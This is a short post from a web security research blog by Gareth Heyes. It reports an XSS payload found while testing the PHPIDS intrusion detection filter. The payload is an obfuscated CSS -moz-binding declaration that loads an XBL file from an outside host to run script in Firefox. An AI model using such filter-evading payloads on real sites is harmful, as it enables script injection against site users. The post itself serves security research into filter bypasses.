- Home
- Blog
  - Blog home
  - RSS
- Login
- Home
- Blog
  - Blog home
  - RSS
- Login

The Spanner
Web security blog

Made by Gareth Heyes
Follow me on Twitter: @garethheyes

Recent posts

Introducing Feedworm: A Privacy-First RSS Reader That Lives in DevTools Speedy RSVP extension AutoVader Hackvertor history and tag finder Shadow Repeater v1.2.3 release Burp Hackvertor v2.1.24 release Hacking rooms XSSing TypeErrors in Safari valueOf: Another way to get this Making the Unexploitable Exploitable with X-Mixed-Replace on Firefox The curious case of the evt parameter CSS-Only Tic Tac Toe Challenge Rewriting relative urls with the base tag in Safari Bypassing DOMPurify with mXSS New IE mutation vector How I smashed MentalJS MentalJS DOM bypass Another XSS auditor bypass XSS Auditor bypass Bypassing the IE XSS filter Unbreakable filter MentalJS bypasses mXSS Java Serialization Bypassing the XSS filter using function reassignment RPO Sandboxed jQuery X-Domain scroll detection on IE using focus Epic fail IE new operator Decoding complex non-alphanumeric JavaScript Hacking Firefox DOM Clobbering Bypassing XSS Auditor The evolution of code Non-Alpha PHP in 6-7 charset Tweetable PHP-Non Alpha MentalJS for PHP Opera x domain with video tutorial Sandboxing and parsing jQuery in 100ms

Awesome XSS

By Gareth Heyes (@hackvertor)

Published 18 years 6 months ago • Last updated March 22, 2025 • ⏱️ < 1 min read

← Back to articles

Hacking the PHPIDS again I found some cool XSS:-

<pre lang="javascript"> <div/style=\-\mo\z\-b\i\nd\in\g:\url(//business \i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)> </pre>

I've moved it onto two lines for correct display.

Who'd have thought that Firefox would allow all that within the url and CSS properties :D

← Back to articles